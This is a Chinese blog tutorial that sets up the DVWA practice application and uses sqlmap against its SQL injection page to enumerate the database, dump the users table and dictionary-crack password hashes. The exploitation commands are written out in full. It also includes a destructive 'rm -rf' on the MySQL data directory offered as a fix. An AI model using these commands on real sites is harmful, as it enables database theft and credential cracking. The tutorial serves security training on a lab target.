使用sqlmap检测sql注入漏洞

痛定思痛。 2021-10-20 01:28 482阅读 0赞

# 一、 sql注入概述并安装sqlmap漏洞查看工具 #

1、 sql注入概述  
所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。  
它是利用现有应用程序，可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库。  
比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击。例：12306.cn和csdn等网站帐号和密码的泄露，都有可能是sql注入导致的。

2、 什么是sqlmap？  
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具，有一个非常棒的特性，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。  
官方网站下载http://sqlmap.org/

3、 安装sqlmap  
环境说明：  
主机名 IP地址 作用  
xuegod120.com 192.168.0.120 SQLmap  
xuegod130.com 192.168.0.130 DVWA渗透测试演练系统

1） 安装python环境  
默认系统中已经安装过python环境  
\[root@xuegod120 ~\]\# python -V  
![在这里插入图片描述][20190821170553909.png]  
如果没有安装python，可以直接使用yum安装  
yum -y install python

2） 安装sqlmap  
将下载的sqlmap软件包上传到服务器，然后解压缩  
\[root@xuegod120 ~\]\# tar xf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz  
![在这里插入图片描述][20190821170559316.png]  
sqlmap用的是python编写，属于解释型语言，需要编译，可以直接使用。

3） 运行sqlmap  
\[root@xuegod120 sqlmapproject-sqlmap-7eab1bc\]\# ./sqlmap.py  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70]  
这里因为没有加相关参数，所以有一个错误提示。

4） 创建sqlmap命令  
\[root@xuegod120 ~\]\# ln -s /root/sqlmapproject-sqlmap-7eab1bc/sqlmap.py /usr/bin/sqlmap  
\[root@xuegod120 ~\]\# sqlmap -h  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 1]  
可以直接使用sqlmap命令

# 二、 安装渗透测试演练系统DVWA #

DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。  
官方网站：链接地址：http://www.dvwa.co.uk 由于是国外的网站，有时可能会打不开。  
注： .uk 是英国的域名后缀。英国的全称是大不列颠及北爱尔兰联合王国，又简称英国〔United Kingdom，UK〕

1、 在xuegod130上部署LAMP环境  
\[root@xuegod130 ~\]\# yum -y install httpd php php-mysql php-gd mariadb-server mariadb  
2、 启动httpd、mariadb  
\[root@xuegod130 ~\]\# systemctl start httpd  
\[root@xuegod130 ~\]\# systemctl start mariadb  
如果启动mariadb报如下错误  
![在这里插入图片描述][20190821170617663.png]  
只需要按照提示清空/var/lib/mysql/目录下的文件即可  
\[root@xuegod130 ~\]\# rm -rf /var/lib/mysql/\*  
\[root@xuegod130 ~\]\# systemctl start mariadb  
![在这里插入图片描述][20190821170625758.png]

3、 创建php探针脚本，测试LAMP环境是否搭建完毕  
\[root@xuegod130 ~\]\# vim /var/www/html/test.php

<?php phpinfo(); ?>

访问测试  
![在这里插入图片描述][20190821170629131.png]

4、 配置mysql数据库  
\[root@xuegod130 ~\]\# mysqladmin -uroot password “123456” \#配置密码为123456  
\[root@xuegod130 ~\]\# mysql -uroot -p123456 \#登录数据库

5、 下载DVWA渗透系统代码上传到服务器，并解压到根目录下  
\[root@xuegod130 ~\]\# yum -y install unzip  
\[root@xuegod130 ~\]\# unzip -d /var/www/html/ DVWA-1.9.zip  
![在这里插入图片描述][2019082117063916.png]  
6、 编辑DVWA配置文件  
配置数据库信息，user和password是mysql的用户名和密码  
\[root@xuegod130 ~\]\# vim /var/www/html/DVWA-1.9/config/config.inc.php  
15 $\_DVWA\[ ‘db\_server’ \] = ‘127.0.0.1’;  
16 $\_DVWA\[ ‘db\_database’ \] = ‘dvwa’;  
17 $\_DVWA\[ ‘db\_user’ \] = ‘root’;  
18 $\_DVWA\[ ‘db\_password’ \] = ‘123456’; \#只需要修改成你的mysql的root用户密码

7、 部署DVWA网站系统  
访问http://192.168.0.130/DVWA-1.9/setup.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 2]

看提示有错误，按照如下修改即可

\[root@xuegod130 ~\]\# vim /etc/php.ini  
改：815 allow\_url\_include = Off  
为： allow\_url\_include = On  
\[root@xuegod130 ~\]\# systemctl restart httpd

报错： reCAPTCHA key: Missing  
扩展：  
reCAPTCHA概述：CMU设计了一个名叫reCAPTCHA的强大系统，让他们的电脑去向人类求助。具体做法是：将OCR（光学字符识别）软件无法识别的文字扫描图传给世界各大网站，用以替换原来的验证码图片；那些网站的用户在正确识别出这些文字之后，其答案便会被传回CMU。  
OCR概述：OCR （Optical Character Recognition，光学字符识别）是指电子设备（例如扫描仪或数码相机）检查纸上打印的字符，通过检测暗、亮的模式确定其形状，然后用字符识别方法将形状翻译成计算机文字的过程；  
解决方法：  
\[root@xuegod130 ~\]\# vim /var/www/html/DVWA-1.9/config/config.inc.php  
改：  
26 $\_DVWA\[ ‘recaptcha\_public\_key’ \] = ‘’;  
27 $\_DVWA\[ ‘recaptcha\_private\_key’ \] = ‘’;  
为：  
$\_DVWA\[ ‘recaptcha\_public\_key’ \] = ‘6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT\_yJg’;  
$\_DVWA\[ ‘recaptcha\_private\_key’ \] = ‘6LdK7xITAzzAAL\_uw9YXVUOPoIHPZLfw2K1n5NVQ’;

扩展：生成自己的谷歌开源免费验证码reCAPTCHA的公钥和私钥。  
上面修改的值就是公钥和私钥值，可以自己在谷歌 后生成私人的公钥和私钥  
访问https://www.google.com/recaptcha/admin/create并用google账户登录，在文本框输入自己网站的网址，如global-key.mycompany.com ，点击create key,生成Public Key和Private Key。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 3]

修改后再次访问，错误已经没有了。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 4]  
8、 点击“Create/Reset Database”，等待2S中后会自动跳转到管理页面

9、 管理页面登录方式  
http://192.168.0.130/DVWA-1.9/login.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 5]

# 三、 使用sqlmap进行sql注入，并获取后台管理员的账号和密码 #

SQLmap语法：SQLmap命令选项被归类为目标（Target）选项、请求（Request）选项、优化、注入、检测、技巧（Techniques）、指纹、枚举等。  
查看sqlmap.py 帮助选项：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 6]  
sqlmap常用参数：  
\-u : 指定目标URL，sql注入点  
–cookie : 当前会话的cookie值  
\-b : 获取数据库类型 检索数据库管理系统的标识  
（DBMS：Database Management System 数据库管理系统）  
–current-db : 获取当前数据库  
–current-user :获取当前登录数据库使用的用户

实战1：枚举登录MYSQL数据库的用户名与密码  
实战2：枚举所有数据库  
实战3：枚举指定数据库的数据表  
实战4：获取dvwa库中users表的所有列名字：  
实战5：拖库，指定数据表中的所有用户名与密码暴力破解成明文密码并dump下来

1、 枚举登录mysql数据库的用户名和密码  
使用sqlmap之前需要得到当前会话的cookie等信息，用来在渗透过程中维持连接状态  
cookie使用其复数形式成为cookies，指某些网站为了识别用户的身份，进行session跟踪，而存储在用户本地终端上的数据，这些数据通常都是加密的。  
只要是登录过网站，就会在本地产生cookie，主要用于身份识别，进行session跟踪。

1） 抓取cookie值  
使用360浏览器或谷歌、火狐浏览器，打开网站，登录上用户名和密码，进入开发模式  
![在这里插入图片描述][2019082117072243.png]

2） 为了方便演示，修改DVWA安全等级为low  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 7]

3） 进入“SQL Injection”部分，输入任意值提交。  
![在这里插入图片描述][20190821170729434.png]  
http://192.168.0.130/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit  
可以看到我们提交的22值后返回的结果，此页面就是我们的目标页面

4） 获取当前页面的cookie值  
![在这里插入图片描述][20190821170733765.png]  
复制cookie值后，排成如下格式：  
security=low;PHPSESSID=glp39jv1sjcs2gbem1pu105hu2

5） 获取数据库的用户名和当前正在使用的数据库名称  
\[root@xuegod120 ~\]\# sqlmap -u “http://192.168.0.130/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit” --cookie=" security=low;PHPSESSID=glp39jv1sjcs2gbem1pu105hu2" -b --current-db --current-user

回车后中间会有几个选项，每项含义如下  
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? \[Y/n\] \#看起来后端DBMS是“mysql”。是否要跳过特定于其他DBMS的测试有效负载？ \#已经识别出来mysql数据库，直接跳过，不在扫描其他类型的数据库，输入Y

for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? \[Y/n\] \#对于其余的测试，是否要包括扩展提供的级别（1）和风险（1）值的“mysql”的所有测试？ \#不需要其他测试，直接输入n

GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? \[y/N\]  
\#get参数“id”易受攻击。你想继续测试其他人吗（如果有的话）？\[y/n\] 输入n

最后结果输出如下：  
![在这里插入图片描述][20190821170744399.png]

2、 使用命令枚举所有登录mysql数据库的用户名和密码hash值，后期可以对密码hash进行破解，生成明文密码  
常用参数：  
–string : 当查询可用时用来匹配页面中的字符串  
–users : 枚举DBMS用户  
–password : 枚举DBMS用户密码hash

\[root@xuegod120 ~\]\# sqlmap -u “http://192.168.0.130/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit” --cookie=“security: low; PHPSESSID: q03ei52p498fa925ntjbhleo90” --string=“Surname” --users –password

弹出消息的含义：  
do you want to store hashes to a temporary file for eventual further processing withother tools \[y/N\] \#是否要将哈希存储到临时文件中，以便最终使用其他工具进行进一步处理

do you want to perform a dictionary-based attack against retrieved password hashes? \[Y/n/q\]  
\#是否要对检索到的密码哈希执行基于字典的攻击？输入y

what dictionary do you want to use? \#你想用什么字典？  
\[1\] default dictionary file ‘/root/sqlmapproject-sqlmap-7eab1bc/txt/wordlist.zip’ (press Enter)  
\#默认字典文件’/root/sqlmapproject-sqlmap-7eab1bc/txt/wordlist.zip’（按Enter键）  
\[2\] custom dictionary file \#自定义词典文件  
\[3\] file with list of dictionary files \#带字典文件列表的文件  
\#直接回车，使用默认字典  
do you want to use common password suffixes? (slow!) \[y/N\]  
\#是否要使用常用密码后缀？（慢！）输入y

运行结果如下：  
![在这里插入图片描述][20190821170753286.png]  
3、 枚举DVWA库中的表  
常用参数  
\-D : 要枚举的DBMS数据库  
–tables : 枚举DBMS数据库中的数据表

\[root@xuegod120 ~\]\# sqlmap -u “http://192.168.0.130/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit” --cookie=“security=low;PHPSESSID=q03ei52p498fa925ntjbhleo90” -D dvwa –tables

运行结果如下；  
![在这里插入图片描述][20190821170758214.png]

4、 获取dvwa库中users表的所有列名字  
常用参数  
\-T : 要枚举的DBMS数据库表  
–columns : 枚举DBMS数据库表中的所有列

\[root@xuegod120 ~\]\# sqlmap -u “http://192.168.0.130/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit” --cookie=“security=low;PHPSESSID=q03ei52p498fa925ntjbhleo90” -D dvwa -T users –columns

运行结果如下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 8]  
5、拖库，获取dvwa库中users表的所有列的名字  
拖库本来是数据库领域的术语，指从数据库中导出数据。到了黑客攻击泛滥的今天，它被用来指网站遭到入侵后，黑客窃取其数据库。  
常用参数：  
\-T : 要枚举的DBMS数据表  
\-C: 要枚举的DBMS数据表中的列  
–dump : 转储DBMS数据表项

弹出消息含义：  
do you want to store hashes to a temporary file for eventual further processing withother tools \[y/N\] \#是否要将哈希值存储到临时文件中，以便其他工具进行处理？

do you want to crack them via a dictionary-based attack? \[Y/n/q\]  
\#你想通过基于字典的攻击破解它们吗？dictionary-based attack基于字典的攻击

运行结果如下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 9]  
从图中可以看出破解得到的密码是经过hash值加密的，但是sqlmap可以导出sql数据，帮你解析成明文密码。

查看导出的数据：  
\[root@xuegod120 ~\]\# cat /root/.sqlmap/output/192.168.0.130/dump/dvwa/users.csv  
user,password  
![在这里插入图片描述][20190821170816561.png]

[20190821170553909.png]: /images/20211019/eddf956ac3e8425696a4a02bc014749e.png
[20190821170559316.png]: /images/20211019/56936cd87963486197cc15f008582bf1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70]: /images/20211019/0e387077f95748a28897ae4cdccfe190.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 1]: /images/20211019/679ee1715a9d4fde811adf5c8f9d00b4.png
[20190821170617663.png]: /images/20211019/088a4901572148bc8f4982b9c0bfb5d5.png
[20190821170625758.png]: /images/20211019/fa389101bb4e44dfb03838ca43d5c2ef.png
[20190821170629131.png]: /images/20211019/1e0bf44b2bdb4b299a0199eac361c592.png
[2019082117063916.png]: /images/20211019/8471b411c23f4c83a7c25e340fad86e9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 2]: /images/20211019/4b015b03b6d3432ca1a518e6c8342e70.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 3]: /images/20211019/ce0e552ac26e4a17a381bde9b4f53d62.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 4]: /images/20211019/dcf4afc4f3464d0eb9b74c95944110d1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 5]: /images/20211019/580ddd227d8740cc9085db1806e63d7d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 6]: /images/20211019/2b0e2eb5c7194638adbecfb989a92535.png
[2019082117072243.png]: /images/20211019/fa24236f49e543afa03a33f29b9c2a1e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 7]: /images/20211019/d38073ebc15244b586da3fd0e524893f.png
[20190821170729434.png]: /images/20211019/f3f1d256a6ec4fbd8f4dd697201b262e.png
[20190821170733765.png]: /images/20211019/d09fbca7359641b19c5753fd360c7a3d.png
[20190821170744399.png]: /images/20211019/d9fc82f8ba504441a4fd8b1066c77c46.png
[20190821170753286.png]: /images/20211019/e5738e5af36446e08b0420ea0c3d1c72.png
[20190821170758214.png]: /images/20211019/56b3cd71f0724017a539533b4eb48a69.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 8]: /images/20211019/5f46907d6bbf4b75aca23a9d8ce56fcf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MTg0MzY5OQ_size_16_color_FFFFFF_t_70 9]: /images/20211019/f9d39aeab4cb47128c86c131a449a59e.png
[20190821170816561.png]: /images/20211019/1bc1ea4dc299483ea3ce0f2aa114e53c.png